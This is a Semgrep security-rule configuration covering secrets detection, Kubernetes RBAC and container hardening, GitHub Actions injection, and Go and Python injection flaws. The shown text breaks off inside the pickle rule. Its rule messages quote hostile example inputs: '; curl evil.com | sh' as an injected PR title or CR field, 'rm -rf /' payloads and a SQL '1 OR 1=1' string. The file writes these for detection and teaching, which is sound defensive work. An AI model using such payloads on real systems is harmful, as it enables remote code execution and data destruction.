semgrep.yaml

# Unified Semgrep Security Rules
# Template Version: 3.0.0
# Generated by security-findings-manager plugin
#
# This is a single unified configuration covering all supported languages:
#   - Go (Kubernetes controllers and operators)
#   - Python (ML/Data Science services and pipelines)
#   - TypeScript / JavaScript (React frontends)
#   - YAML (Kubernetes manifests, GitHub Actions workflows)
#   - Generic patterns (secrets detection across all file types)
#
# Semgrep automatically skips rules whose language is not present in the
# scanned repository, so it is safe to include all rules in every repo.
#
# Deduplicated from per-language templates:
#   semgrep-kubernetes-operator.yaml, semgrep-python.yaml,
#   semgrep-typescript.yaml, semgrep-generic.yaml

rules:
  # ==========================================================================
  # SECTION 1: GENERIC SECRETS DETECTION — Applies to all file types
  # ==========================================================================

  - id: generic-hardcoded-secret
    languages: [generic]
    severity: ERROR
    message: |
      Potential hardcoded secret detected (CWE-798).

      Pattern matches: password, passwd, pwd, secret, token, api_key, apikey, private_key

      Security Risk: Credentials in source code are visible in:
        - Git history (even if deleted later)
        - Container images
        - CI/CD logs
        - Backup systems

      Remediation: Use environment variables or secret management:
        - Kubernetes: Use Secrets or SealedSecrets
        - GitHub Actions: Use repository/organization secrets
        - Local development: Use .env files (add to .gitignore)

      If this is a test fixture or example:
        - Add comment: # nosemgrep: generic-hardcoded-secret
        - Or use obviously fake values: password = "FAKE"
    patterns:
      - pattern-regex: |-
          (?i)(password|passwd|pwd|secret|token|api[_-]?key|private[_-]?key)\s*[:=]+\s*["'][^"']{8,}["']
    metadata:
      cwe: "CWE-798"
      owasp: "A07:2021 - Identification and Authentication Failures"
      category: "security"

  - id: generic-aws-access-key
    languages: [generic]
    severity: ERROR
    message: |
      AWS Access Key ID detected (AKIA...).

      Format: AKIA[0-9A-Z]{16}

      Immediate Action:
        1. Rotate this key in AWS IAM console immediately
        2. Check CloudTrail for unauthorized access
        3. Revoke any sessions using this key

      Prevention:
        - Use IAM roles for EC2/ECS/Lambda (no keys needed)
        - Use IAM roles for service accounts (IRSA) in Kubernetes
        - Store keys in AWS Secrets Manager or SSM Parameter Store
        - Enable AWS CloudTrail for key usage monitoring

      False Positive: If this is documentation/example, replace with:
        AKIA...EXAMPLE (redacted AWS example key)
    pattern-regex: 'AKIA[0-9A-Z]{16}'
    metadata:
      cwe: "CWE-798"
      category: "security"

  - id: generic-aws-secret-access-key
    languages: [generic]
    severity: ERROR
    message: |
      AWS Secret Access Key detected.

      Pattern: 40-character base64 string (often paired with AKIA... access key)

      Immediate Action: Rotate both access key and secret key immediately.

      Note: This may have false positives for other base64 strings.
    pattern-regex: |-
      (?i)(aws_secret_access_key|aws[_-]?secret)\s*[:=]\s*["'][A-Za-z0-9/+=]{40}["']
    metadata:
      cwe: "CWE-798"
      category: "security"

  - id: generic-private-key
    languages: [generic]
    severity: ERROR
    message: |
      Private key detected in code.

      Security Risk: Private keys in source code compromise PKI security:
        - SSL/TLS certificates (MITM attacks possible)
        - SSH keys (unauthorized server access)
        - Code signing certificates (malware distribution)

      Remediation:
        - Remove from code immediately
        - Revoke and regenerate keypair
        - Use Kubernetes TLS secrets or cert-manager for certificates
        - Use SSH agent or credential managers for SSH keys

      If this is documentation or a test fixture, consider suppressing the finding.
    pattern-regex: '-----BEGIN (RSA|DSA|EC|OPENSSH|PGP) PRIVATE KEY-----'
    metadata:
      cwe: "CWE-798"
      category: "security"

  - id: generic-github-token
    languages: [generic]
    severity: ERROR
    message: |
      GitHub Personal Access Token detected.

      Format: ghp_[A-Za-z0-9]{36} (classic) or github_pat_[A-Za-z0-9_]+ (fine-grained)

      Immediate Action:
        1. Revoke token at https://github.com/settings/tokens
        2. Check audit log for unauthorized access
        3. Rotate all tokens with same permissions

      Prevention:
        - Use GitHub Apps instead of PATs (scoped permissions, audit trail)
        - Use GITHUB_TOKEN in Actions (automatic, scoped to workflow)
        - Set token expiration (max 90 days)
    pattern-regex: '(ghp_[A-Za-z0-9]{36}|github_pat_[A-Za-z0-9_]+)'
    metadata:
      cwe: "CWE-798"
      category: "security"

  - id: generic-slack-webhook
    languages: [generic]
    severity: ERROR
    message: |
      Slack Webhook URL detected.

      Format: https://hooks.slack.com/services/T.../B.../...

      Security Risk: Webhook URL allows posting to Slack channel (spam, phishing).

      Remediation: Regenerate webhook in Slack workspace settings.
    pattern-regex: 'https://hooks\.slack\.com/services/T[A-Z0-9]+/B[A-Z0-9]+/[A-Za-z0-9]+'
    metadata:
      cwe: "CWE-798"
      category: "security"

  - id: generic-google-api-key
    languages: [generic]
    severity: ERROR
    message: |
      Google API Key detected.

      Format: AIza[A-Za-z0-9_-]{35}

      Immediate Action:
        1. Revoke key in Google Cloud Console
        2. Check usage logs for unauthorized requests
        3. Rotate all API keys

      Prevention: Use service accounts with IAM instead of API keys.
    pattern-regex: 'AIza[A-Za-z0-9_-]{35}'
    metadata:
      cwe: "CWE-798"
      category: "security"

  # ==========================================================================
  # SECTION 2: KUBERNETES RBAC SECURITY — Privilege Escalation Prevention
  # ==========================================================================

  - id: k8s-rbac-wildcard-resources
    languages: [yaml]
    severity: ERROR
    message: |
      RBAC rule allows wildcard resources ["*"] - enables privilege escalation (CWE-269).

      Attack Vector: A compromised pod with this ClusterRole can access ALL resource types
      including Secrets, which may contain credentials for further lateral movement.

      Remediation: Use specific resource names:
        resources: ["pods", "services", "configmaps", "deployments"]

      References:
        - CWE-269: Improper Privilege Management
        - OWASP A01:2021 - Broken Access Control
    patterns:
      - pattern: |
          resources:
            - "*"
      - pattern-inside: |
          kind: ClusterRole
          ...
      - pattern-not-inside: |
          # Exclude test fixtures
          metadata:
            namespace: test
    metadata:
      cwe: "CWE-269"
      owasp: "A01:2021"
      category: "security"

  - id: k8s-rbac-wildcard-verbs
    languages: [yaml]
    severity: ERROR
    message: |
      RBAC rule allows wildcard verbs ["*"] - enables privilege escalation (CWE-269).

      Attack Vector: Grants all permissions (get, list, create, update, patch, delete, deletecollection).
      A compromised pod can delete critical resources or modify RBAC rules to escalate privileges.

      Remediation: Use specific verbs based on least privilege:
        verbs: ["get", "list", "watch"]  # Read-only
        verbs: ["create", "update"]      # Write permissions

      Never allow: ["escalate", "impersonate", "bind"] - these enable direct privilege escalation.
    patterns:
      - pattern: |
          verbs:
            - "*"
      - pattern-inside: |
          kind: ClusterRole
          ...
    metadata:
      cwe: "CWE-269"
      owasp: "A01:2021"
      category: "security"

  - id: k8s-rbac-dangerous-verbs
    languages: [yaml]
    severity: ERROR
    message: |
      RBAC rule contains dangerous verbs that enable privilege escalation.

      Dangerous verbs:
        - "escalate": Allows modifying RBAC rules to grant higher privileges
        - "impersonate": Allows acting as other users/service accounts
        - "bind": Allows binding ClusterRoles without owning all permissions

      Remediation: Remove dangerous verbs. Use specific permissions instead.
    pattern-either:
      - pattern: |
          verbs:
            - ...
            - "escalate"
            - ...
      - pattern: |
          verbs:
            - ...
            - "impersonate"
            - ...
      - pattern: |
          verbs:
            - ...
            - "bind"
            - ...
    metadata:
      cwe: "CWE-269"
      category: "security"

  - id: k8s-rbac-cluster-admin-binding
    languages: [yaml]
    severity: WARNING
    message: |
      Binding to cluster-admin detected (CWE-269).

      The cluster-admin ClusterRole grants unrestricted access to ALL resources in ALL namespaces.
      This is almost never needed for application workloads.

      Remediation: Create a custom ClusterRole with least-privilege permissions:
        kind: ClusterRole
        rules:
          - apiGroups: [""]
            resources: ["pods"]
            verbs: ["get", "list", "watch"]
    patterns:
      - pattern: |
          roleRef:
            name: cluster-admin
            ...
    metadata:
      cwe: "CWE-269"
      category: "security"

  - id: k8s-rbac-broad-subject
    languages: [yaml]
    severity: ERROR
    message: |
      RBAC binding to system:authenticated or system:unauthenticated (CWE-269).

      These groups include ALL authenticated/unauthenticated users in the cluster.
      Binding to these grants access to every user, including service accounts
      from all namespaces.

      Remediation: Bind to specific ServiceAccounts, Users, or Groups instead.
    patterns:
      - pattern-either:
          - pattern: |
              subjects:
                - kind: Group
                  name: system:authenticated
          - pattern: |
              subjects:
                - kind: Group
                  name: system:unauthenticated
    metadata:
      cwe: "CWE-269"
      category: "security"

  - id: k8s-rbac-create-persistentvolumes
    languages: [yaml]
    severity: WARNING
    message: |
      Permission to create PersistentVolumes can enable host-level privilege escalation (CWE-269).

      A ClusterRole with create access to PersistentVolumes can provision hostPath PVs,
      allowing pods to mount arbitrary host directories.

      Remediation: Restrict PV creation to cluster administrators only.
      Use PersistentVolumeClaims for application workloads.
    patterns:
      - pattern: |
          kind: ClusterRole
          ...
          rules:
            - ...
              resources:
                - persistentvolumes
              ...
              verbs:
                - create
    metadata:
      cwe: "CWE-269"
      category: "security"

  - id: k8s-rbac-aggregated-clusterrole
    languages: [yaml]
    severity: INFO
    message: |
      Aggregated ClusterRole detected.

      Review aggregation selectors carefully to prevent unintended permission grants.
      Aggregated roles can accumulate unexpected permissions if selectors are too broad.
    patterns:
      - pattern: |
          aggregationRule:
            ...
      - pattern-inside: |
          kind: ClusterRole
          ...
    metadata:
      category: "security"
      note: "Not necessarily dangerous, but aggregated roles can accumulate unexpected permissions if selectors are too broad"

  - id: k8s-rbac-secrets-cluster-access
    languages: [yaml]
    severity: WARNING
    message: |
      ClusterRole grants secret access (get/list/watch) across all namespaces (CWE-200).

      Secrets may contain credentials, TLS certificates, and other sensitive data.
      Cluster-wide access allows reading secrets from all namespaces.

      Remediation: Use namespace-scoped Role instead of ClusterRole for secrets access
      unless cross-namespace access is explicitly required.
    patterns:
      - pattern: |
          resources:
            - secrets
      - pattern-either:
          - pattern-inside: |
              kind: ClusterRole
              ...
              rules:
                - verbs:
                    - get
          - pattern-inside: |
              kind: ClusterRole
              ...
              rules:
                - verbs:
                    - list
          - pattern-inside: |
              kind: ClusterRole
              ...
              rules:
                - verbs:
                    - watch
    metadata:
      cwe: "CWE-200"
      category: "security"

  - id: k8s-rolebinding-references-clusterrole
    languages: [yaml]
    severity: WARNING
    message: |
      RoleBinding references a ClusterRole (CWE-269).

      While this is a valid Kubernetes pattern for namespace-scoping cluster-level
      permissions, it deserves review to ensure the referenced ClusterRole does not
      grant more permissions than intended for this namespace.

      Remediation: Verify the referenced ClusterRole has appropriate permissions.
      Consider creating a namespace-scoped Role if only specific permissions are needed.
    patterns:
      - pattern: |
          kind: RoleBinding
          ...
          roleRef:
            kind: ClusterRole
            ...
    metadata:
      cwe: "CWE-269"
      category: "security"

  # ==========================================================================
  # SECTION 3: KUBERNETES CONTAINER SECURITY
  # ==========================================================================

  - id: k8s-privileged-container
    languages: [yaml]
    severity: ERROR
    message: |
      Container runs in privileged mode - allows host access (CWE-250).

      Attack Vector: Privileged containers can access host devices, mount host filesystems,
      and bypass all Linux security modules (SELinux, AppArmor). This enables container escape.

      Remediation: Remove "privileged: true". Use specific capabilities if needed:
        securityContext:
          capabilities:
            add: ["NET_ADMIN"]  # Only grant specific capabilities
    pattern: |
      securityContext:
        ...
        privileged: true
        ...
    metadata:
      cwe: "CWE-250"
      owasp: "A01:2021"
      category: "security"

  - id: k8s-missing-security-context-runAsNonRoot
    languages: [yaml]
    severity: WARNING
    message: |
      Pod/Container missing securityContext.runAsNonRoot.

      Best Practice: Containers should not run as root (UID 0) to limit impact of container escape.

      Remediation: Add to pod or container spec:
        securityContext:
          runAsNonRoot: true
          runAsUser: 1000  # Non-root UID
    patterns:
      - pattern-inside: |
          kind: $KIND
          ...
      - metavariable-regex:
          metavariable: $KIND
          regex: ^(Deployment|StatefulSet|DaemonSet|Pod)$
      - pattern-not: |
          securityContext:
            ...
            runAsNonRoot: true
            ...
    metadata:
      category: "security"
      severity: "warning"

  - id: k8s-hostpath-mount
    languages: [yaml]
    severity: ERROR
    message: |
      Container mounts hostPath volume - allows host filesystem access (CWE-653).

      Attack Vector: hostPath mounts bypass container isolation. A compromised pod can
      read/write host files including /etc/shadow, SSH keys, or Kubernetes secrets.

      Remediation: Use PersistentVolumeClaims, ConfigMaps, or Secrets instead.
      If hostPath is absolutely necessary (e.g., DaemonSet for node monitoring),
      mount as readOnly and restrict to specific paths.
    pattern: |
      volumes:
        - name: $NAME
          hostPath:
            path: $PATH
    metadata:
      cwe: "CWE-653"
      category: "security"

  - id: k8s-secret-in-configmap
    languages: [yaml]
    severity: ERROR
    message: |
      Secret value stored in ConfigMap instead of Secret.

      Security Risk: ConfigMaps are not designed for sensitive data:
        - Not encrypted at rest by default
        - Visible in kubectl get configmap -o yaml
        - No audit logging for access
        - May be logged by monitoring tools

      Remediation: Use Secret instead:
        apiVersion: v1
        kind: Secret
        metadata:
          name: my-secret
        type: Opaque
        data:
          password: <base64-encoded-value>

      Or use external secret management: SealedSecrets, external-secrets, Vault.
    patterns:
      - pattern-either:
          - pattern: |
              kind: ConfigMap
              ...
              data:
                password: $VALUE
          - pattern: |
              kind: ConfigMap
              ...
              data:
                token: $VALUE
          - pattern: |
              kind: ConfigMap
              ...
              data:
                apiKey: $VALUE
    metadata:
      cwe: "CWE-522"
      category: "security"

  - id: yaml-hardcoded-secret
    languages: [yaml]
    severity: WARNING
    message: |
      Potential hardcoded secret in YAML file.

      Keys matching: password, passwd, secret, token, apiKey, privateKey

      Remediation: Move secrets to environment variables or secret management.
    pattern-regex: |-
      (?i)^[[:space:]]*(password|passwd|secret|token|api[_-]?key|private[_-]?key):[[:space:]]*["']?[^"'\s]{8,}
    metadata:
      cwe: "CWE-798"
      category: "security"

  - id: k8s-pod-automount-token
    languages: [yaml]
    severity: WARNING
    message: |
      Workload explicitly enables automountServiceAccountToken (CWE-200).

      When enabled, the ServiceAccount token is mounted into the pod at
      /var/run/secrets/kubernetes.io/serviceaccount/token. If the pod is
      compromised, the attacker can use this token to access the Kubernetes API.

      Remediation: Set automountServiceAccountToken: false if the pod doesn't
      need Kubernetes API access (most application pods don't).
    pattern-either:
      # Match Pod directly
      - patterns:
          - pattern: |
              automountServiceAccountToken: true
          - pattern-inside: |
              kind: Pod
              ...
      # Match Deployment, StatefulSet, DaemonSet, ReplicaSet pod template
      - patterns:
          - pattern: |
              automountServiceAccountToken: true
          - pattern-inside: |
              kind: $KIND
              ...
              spec:
                ...
                template:
                  ...
          - metavariable-regex:
              metavariable: $KIND
              regex: (Deployment|StatefulSet|DaemonSet|ReplicaSet)
      # Match Job pod template
      - patterns:
          - pattern: |
              automountServiceAccountToken: true
          - pattern-inside: |
              kind: Job
              ...
              spec:
                ...
                template:
                  ...
      # Match CronJob pod template (nested under jobTemplate)
      - patterns:
          - pattern: |
              automountServiceAccountToken: true
          - pattern-inside: |
              kind: CronJob
              ...
              spec:
                ...
                jobTemplate:
                  ...
                  spec:
                    ...
                    template:
                      ...
    metadata:
      cwe: "CWE-200"
      category: "security"

  - id: k8s-pod-default-serviceaccount
    languages: [yaml]
    severity: WARNING
    message: |
      Workload uses default ServiceAccount (CWE-250).

      The default ServiceAccount may have more permissions than needed.
      Each workload should use a dedicated ServiceAccount with minimal RBAC
      permissions following the principle of least privilege.

      Remediation: Create a dedicated ServiceAccount:
        apiVersion: v1
        kind: ServiceAccount
        metadata:
          name: my-app-sa
    pattern-either:
      # Match Pod directly — explicit default
      - pattern: |
          kind: Pod
          ...
          spec:
            ...
            serviceAccountName: default
      # Match Pod directly — no SA specified
      - patterns:
          - pattern: |
              kind: Pod
              ...
              spec:
                ...
          - pattern-not: |
              serviceAccountName: $SA
      # Match controllers — explicit default
      - patterns:
          - pattern: |
              spec:
                ...
                template:
                  ...
                  spec:
                    ...
                    serviceAccountName: default
          - pattern-inside: |
              kind: $KIND
              ...
          - metavariable-regex:
              metavariable: $KIND
              regex: (Deployment|StatefulSet|DaemonSet|ReplicaSet|Job)
      # Match controllers — no SA specified (implicit default)
      - patterns:
          - pattern: |
              spec:
                ...
                template:
                  ...
                  spec:
                    ...
          - pattern-not: |
              spec:
                ...
                template:
                  ...
                  spec:
                    ...
                    serviceAccountName: $SA
          - pattern-inside: |
              kind: $KIND
              ...
          - metavariable-regex:
              metavariable: $KIND
              regex: (Deployment|StatefulSet|DaemonSet|ReplicaSet|Job)
      # Match CronJob — explicit default
      - patterns:
          - pattern: |
              spec:
                ...
                jobTemplate:
                  ...
                  spec:
                    ...
                    template:
                      ...
                      spec:
                        ...
                        serviceAccountName: default
          - pattern-inside: |
              kind: CronJob
              ...
      # Match CronJob — no SA specified (implicit default)
      - patterns:
          - pattern: |
              spec:
                ...
                jobTemplate:
                  ...
                  spec:
                    ...
                    template:
                      ...
                      spec:
                        ...
          - pattern-not: |
              spec:
                ...
                jobTemplate:
                  ...
                  spec:
                    ...
                    template:
                      ...
                      spec:
                        ...
                        serviceAccountName: $SA
          - pattern-inside: |
              kind: CronJob
              ...
    metadata:
      cwe: "CWE-250"
      category: "security"

  # ==========================================================================
  # SECTION 4: GITHUB ACTIONS SECURITY — Workflow files
  # ==========================================================================

  - id: github-actions-hardcoded-secret
    languages: [yaml]
    severity: ERROR
    message: |
      Hardcoded secret in GitHub Actions workflow.

      Security Risk: Secrets in workflows are visible in git history and to all collaborators.

      Remediation: Use GitHub Secrets:
        env:
          API_KEY: ${{ secrets.API_KEY }}

      Add secret at: Repository Settings > Secrets and variables > Actions > New repository secret
    patterns:
      - pattern-either:
          - pattern: |
              env:
                $KEY: $VALUE
          - pattern: |
              with:
                $KEY: $VALUE
      - metavariable-regex:
          metavariable: $KEY
          regex: (?i)(password|passwd|token|api[_-]?key|secret)
      - metavariable-pattern:
          metavariable: $VALUE
          patterns:
            - pattern-not: ${{ secrets.$SECRET }}
            - pattern-not: ${{ env.$ENV }}
    paths:
      include:
        - "**/.github/workflows/*.yml"
        - "**/.github/workflows/*.yaml"
    metadata:
      cwe: "CWE-798"
      category: "security"

  - id: github-actions-script-injection
    languages: [generic]
    severity: ERROR
    message: |
      GitHub Actions expression injection in workflow run block (CWE-78).

      Attack Vector: Attacker-controlled values from PR titles, issue bodies, branch names,
      or commit messages are interpolated directly into shell commands:
        run: echo "${{ github.event.pull_request.title }}"
        # PR title: "; curl evil.com | sh"

      Dangerous fields (attacker-controlled text):
        - github.event.issue.title / body
        - github.event.pull_request.title / body / head.ref
        - github.event.comment.body
        - github.event.review.body
        - github.event.discussion.title / body
        - github.event.head_commit.message
        - github.head_ref

      Safe fields (constrained values - do not flag):
        - github.event.number, github.event.action, github.sha, github.actor

      Remediation: Move to environment variable (shell handles escaping):
        - name: Process PR
          run: echo "$TITLE"
          env:
            TITLE: ${{ github.event.pull_request.title }}
    patterns:
      - pattern-regex: 'run:\s*(?:[|>][-+]?\n(?:[ \t]+[^\n]*\n)*|[^\n]*)\$\{\{\s*github\.(head_ref|event\.(issue|pull_request|discussion|review|review_comment|comment)\.(title|body|head\.ref|head\.label)|event\.head_commit\.message|event\.commits\[\d+\]\.message)\s*\}\}'
    paths:
      include:
        - "**/.github/workflows/*.yml"
        - "**/.github/workflows/*.yaml"
    metadata:
      cwe: "CWE-78"
      owasp: "A03:2021 - Injection"
      category: "security"
      references:
        - "https://docs.github.com/en/actions/security-for-github-actions/security-guides/security-hardening-for-github-actions#understanding-the-risk-of-script-injections"

  - id: github-actions-pull-request-target-checkout
    languages: [generic]
    severity: WARNING
    message: |
      Unsafe checkout in pull_request_target workflow (CWE-829).

      Attack Vector: pull_request_target runs with WRITE token and access to secrets.
      If the workflow checks out the PR head code, a malicious PR can:
        1. Modify build scripts to steal secrets
        2. Push malicious code with write permissions
        3. Execute arbitrary commands with elevated privileges

      Unsafe patterns (flag these):
        ref: ${{ github.event.pull_request.head.sha }}
        ref: ${{ github.event.pull_request.head.ref }}

      Safe patterns (do not flag):
        - No ref specified (defaults to base branch)
        - ref: refs/pull/${{ github.event.number }}/merge
        - ref: ${{ github.event.pull_request.base.sha }}

      Remediation:
        - Use artifact passing between workflows instead of direct checkout
        - If checkout is needed, use merge commit: refs/pull/${{ github.event.number }}/merge
        - Add persist-credentials: false to limit token scope
    patterns:
      - pattern-regex: 'pull_request_target[\s\S]*?uses:\s*actions/checkout@[^\n]*\n(\s+[\w-]+:.*\n)*\s+ref:\s*\$\{\{[^\}]*pull_request\.head\.(sha|ref)\s*\}\}'
    paths:
      include:
        - "**/.github/workflows/*.yml"
        - "**/.github/workflows/*.yaml"
    metadata:
      cwe: "CWE-829"
      category: "security"
      references:
        - "https://securitylab.github.com/research/github-actions-preventing-pwn-requests/"

  # ==========================================================================
  # SECTION 5: GO SECURITY — Kubernetes Controllers & Operators
  # ==========================================================================

  - id: go-exec-command-shell-injection
    languages: [go]
    severity: ERROR
    message: |
      Command injection via shell execution (CWE-78).

      Attack Vector: User-controlled input from CR spec can be injected into shell commands:
        exec.Command("/bin/sh", "-c", "echo " + cr.Spec.UserInput)
      Input like: "; rm -rf /" would execute arbitrary commands.

      Remediation: Use exec.Command with separate arguments (no shell):
        cmd := exec.Command("echo", cr.Spec.UserInput)  # Safe - no shell interpretation

      Or validate input with allowlist regex before using in shell commands.
    patterns:
      - pattern-either:
          - pattern: exec.Command("/bin/sh", "-c", ...)
          - pattern: exec.Command("sh", "-c", ...)
          - pattern: exec.Command("/bin/bash", "-c", ...)
          - pattern: exec.Command("bash", "-c", ...)
    metadata:
      cwe: "CWE-78"
      owasp: "A03:2021"
      category: "security"

  - id: go-tls-insecure-skip-verify
    languages: [go]
    severity: ERROR
    message: |
      TLS certificate verification disabled (CWE-295).

      Attack Vector: Enables Man-in-the-Middle attacks. Attacker can intercept traffic
      to external APIs and steal credentials or manipulate responses.

      Remediation: Remove "InsecureSkipVerify: true" and use proper certificate validation.
      For custom CAs, add to system trust store or use custom RootCAs.
    pattern: |
      &tls.Config{
        ...,
        InsecureSkipVerify: true,
        ...
      }
    metadata:
      cwe: "CWE-295"
      owasp: "A02:2021"
      category: "security"

  - id: go-kubernetes-client-no-owner-reference
    languages: [go]
    severity: WARNING
    message: |
      Creating Kubernetes resource without OwnerReference.

      Best Practice: Child resources should have OwnerReferences to their parent CR.
      Without this, resources become orphaned when the CR is deleted (garbage collection fails).

      Remediation: Use controller-runtime helper:
        import "sigs.k8s.io/controller-runtime/pkg/controller/controllerutil"

        if err := controllerutil.SetControllerReference(parentCR, childResource, r.Scheme); err != nil {
          return err
        }
        if err := r.Create(ctx, childResource); err != nil {
          return err
        }
    patterns:
      - pattern: $CLIENT.Create($CTX, $RESOURCE)
      - pattern-not-inside: |
          controllerutil.SetControllerReference(...)
          ...
          $CLIENT.Create($CTX, $RESOURCE)
    metadata:
      category: "best-practice"

  - id: go-cr-spec-to-configmap-without-validation
    languages: [go]
    severity: ERROR
    message: |
      CR spec field used in ConfigMap without validation - enables injection attacks.

      Attack Vector: User can create CR with malicious data that gets injected into pods:
        apiVersion: v1
        kind: MyCR
        spec:
          command: "curl evil.com | sh"  # Attacker-controlled

      If operator creates ConfigMap/Secret with this data and pod uses it in command,
      attacker achieves remote code execution.

      Remediation: Validate CR spec fields before storing in ConfigMap:
        - Check length limits (prevent resource exhaustion)
        - Validate character patterns (no shell metacharacters: $, `, |, ;, &)
        - Use allowlist regex for expected formats
        - Sanitize or reject invalid input
    patterns:
      - pattern-either:
          - pattern: |
              Data: map[string]string{
                ...,
                $KEY: $CR.Spec.$FIELD,
                ...,
              }
          - pattern: |
              Data[$KEY] = $CR.Spec.$FIELD
      - pattern-inside: |
          &corev1.ConfigMap{
            ...
          }
      - pattern-not-inside: |
          if $VALIDATION {
            ...
          }
    metadata:
      cwe: "CWE-20"
      category: "security"

  - id: go-sql-injection
    languages: [go]
    severity: ERROR
    message: |
      SQL injection vulnerability (CWE-89).

      Attack Vector: User input concatenated into SQL query:
        query := fmt.Sprintf("SELECT * FROM users WHERE id = %s", userID)
      Input like "1 OR 1=1" would bypass authentication or leak data.

      Remediation: Use parameterized queries:
        db.Query("SELECT * FROM users WHERE id = ?", userID)
    patterns:
      - pattern-either:
          - pattern: $DB.Query(fmt.Sprintf(..., $INPUT, ...), ...)
          - pattern: $DB.Exec(fmt.Sprintf(..., $INPUT, ...), ...)
          - pattern: $DB.Query($QUERY + $INPUT, ...)
          - pattern: $DB.Exec($QUERY + $INPUT, ...)
    metadata:
      cwe: "CWE-89"
      owasp: "A03:2021"
      category: "security"

  - id: go-weak-crypto-md5
    languages: [go]
    severity: WARNING
    message: |
      Weak cryptographic hash MD5 detected (CWE-327).

      MD5 is cryptographically broken (collision attacks). Do not use for security purposes.

      Remediation: Use SHA-256 or SHA-3:
        import "crypto/sha256"
        hash := sha256.Sum256(data)
    patterns:
      - pattern-either:
          - pattern: md5.New()
          - pattern: md5.Sum($DATA)
    metadata:
      cwe: "CWE-327"
      category: "security"

  - id: go-weak-crypto-sha1
    languages: [go]
    severity: WARNING
    message: |
      Weak cryptographic hash SHA1 detected (CWE-327).

      SHA1 is deprecated due to collision attacks. Do not use for security purposes.

      Remediation: Use SHA-256 or SHA-3.
    patterns:
      - pattern-either:
          - pattern: sha1.New()
          - pattern: sha1.Sum($DATA)
    metadata:
      cwe: "CWE-327"
      category: "security"

  - id: go-hardcoded-credentials
    languages: [go]
    severity: ERROR
    message: |
      Hardcoded credentials detected (CWE-798).

      Security Risk: Credentials in source code are visible in git history and container images.

      Remediation: Use environment variables or Kubernetes Secrets:
        password := os.Getenv("DATABASE_PASSWORD")
    patterns:
      - pattern-either:
          - pattern: |
              $VAR := $VALUE
          - pattern: |
              const $VAR = $VALUE
          - pattern: |
              var $VAR = $VALUE
      - metavariable-regex:
          metavariable: $VAR
          regex: (?i)(password|passwd|secret|token|api[_-]?key|private[_-]?key|credentials?)
      - metavariable-regex:
          metavariable: $VALUE
          regex: '"[^"]{8,}"'
      - pattern-not: |
          $VAR := os.Getenv("...")
      - pattern-not: |
          var $VAR = os.Getenv("...")
      - pattern-not: |
          $VAR, $_ := os.LookupEnv("...")
    metadata:
      cwe: "CWE-798"
      owasp: "A07:2021"
      category: "security"

  - id: go-log-sensitive-data
    languages: [go]
    severity: WARNING
    message: |
      Logging sensitive data from Kubernetes Secret.

      Security Risk: Secrets logged to stdout appear in:
        - Kubernetes pod logs (accessible via kubectl logs)
        - Log aggregation systems (Splunk, Elasticsearch)
        - Container runtime logs on nodes

      Remediation: Never log Secret.Data fields. Log metadata only:
        logger.Info("Processing secret", "name", secret.Name, "namespace", secret.Namespace)
    patterns:
      - pattern-either:
          - pattern: $LOG.$METHOD(..., $SECRET.Data, ...)
          - pattern: $LOG.$METHOD(..., $SECRET.Data[$KEY], ...)
      - metavariable-regex:
          metavariable: $METHOD
          regex: ^(Info|Error|Debug|Warn|Printf|Println)$
    metadata:
      cwe: "CWE-532"
      category: "security"

  - id: go-tls-config-no-min-version
    languages: [go]
    severity: INFO
    message: |
      TLS config without explicit MinVersion (CWE-326).

      Go 1.18+ defaults to TLS 1.2 minimum, but explicit configuration is recommended
      for compliance clarity (FedRAMP, FIPS) and defense in depth.

      Remediation: Set MinVersion explicitly:
        &tls.Config{
          MinVersion: tls.VersionTLS12,
        }
    patterns:
      - pattern: |
          &tls.Config{
            ...
          }
      - pattern-not: |
          &tls.Config{
            ...,
            MinVersion: ...,
            ...
          }
    paths:
      exclude:
        - "**/vendor/**"
    metadata:
      cwe: "CWE-326"
      category: "security"

  - id: go-http-client-no-timeout
    languages: [go]
    severity: WARNING
    message: |
      HTTP client without timeout can hang indefinitely (CWE-400).

      An http.Client without an explicit Timeout will wait forever for a response,
      which can exhaust goroutines and file descriptors under load or network issues.

      Remediation: Always set a Timeout:
        client := &http.Client{
          Timeout: 30 * time.Second,
        }
    patterns:
      - pattern: |
          &http.Client{
            ...
          }
      - pattern-not: |
          &http.Client{
            ...,
            Timeout: ...,
            ...
          }
    metadata:
      cwe: "CWE-400"
      category: "security"

  # ==========================================================================
  # SECTION 6: PYTHON SECURITY — ML/Data Science Applications
  # ==========================================================================

  - id: python-eval-exec-injection
    languages: [python]
    severity: ERROR
    message: |
      Code injection via eval() or exec() (CWE-94).

      Attack Vector: User-controlled input from API requests, notebook cells, or config files
      can execute arbitrary Python code:
        eval(user_input)  # Input: "__import__('os').system('rm -rf /')"

      Remediation: Never use eval/exec with untrusted input.
      For safe evaluation of literals, use ast.literal_eval():
        import ast
        value = ast.literal_eval(user_input)  # Only parses literals (strings, numbers, lists)
    patterns:
      - pattern-either:
          - pattern: eval($INPUT)
          - pattern: exec($INPUT)
    metadata:
      cwe: "CWE-94"
      owasp: "A03:2021 - Injection"
      category: "security"

  - id: python-sql-injection-format
    languages: [python]
    severity: ERROR
    message: |
      SQL injection via f-string or format() (CWE-89).

      Attack Vector: User input in SQL query enables data exfiltration or authentication bypass:
        cursor.execute(f"SELECT * FROM users WHERE id = {user_id}")
        # Input: "1 OR 1=1" would return all users

      Remediation: Use parameterized queries:
        cursor.execute("SELECT * FROM users WHERE id = %s", (user_id,))  # PostgreSQL
        cursor.execute("SELECT * FROM users WHERE id = ?", (user_id,))   # SQLite
    patterns:
      - pattern-either:
          - pattern: $CURSOR.execute(f"...")
          - pattern: $CURSOR.execute("...".format(...))
          - pattern: $CURSOR.execute($QUERY + $INPUT)
    metadata:
      cwe: "CWE-89"
      owasp: "A03:2021 - Injection"
      category: "security"

  - id: python-pickle-unsafe-load
    languages: [python]
    severity: ERROR
    message: |
      Unsafe pickle.load() - arbitrary code execution (CWE-502).

      Attack Vector: Pickle can execute arbitrary code during deserialization.
      A malicious .pkl file can:
        - Execute shell commands (os.system("..."))
        - Exfiltrate data to attacker-controlled servers
        - Install backdoors in the ML serving environment

      Why ML Models Are Targets: PyTorch, scikit-learn, and XGBoost use pickle by default.
      Attacker uploads poisoned model -> triggers remote code execution on inference.

      Remediation:
        1. Use safer formats: ONNX, HDF5, SavedModel (TensorFlow), TorchScript
        2. If pickle is required, validate file source and use signature verification
        3. Run model loading in sandboxed environment with restricted permissions
        4. Never load pickle files from untrusted sources (user uploads, HTTP downloads)

      Safe alternatives:
        # PyTorch
        torch.jit.save(model, "model.pt")  # TorchScript (no pickle)

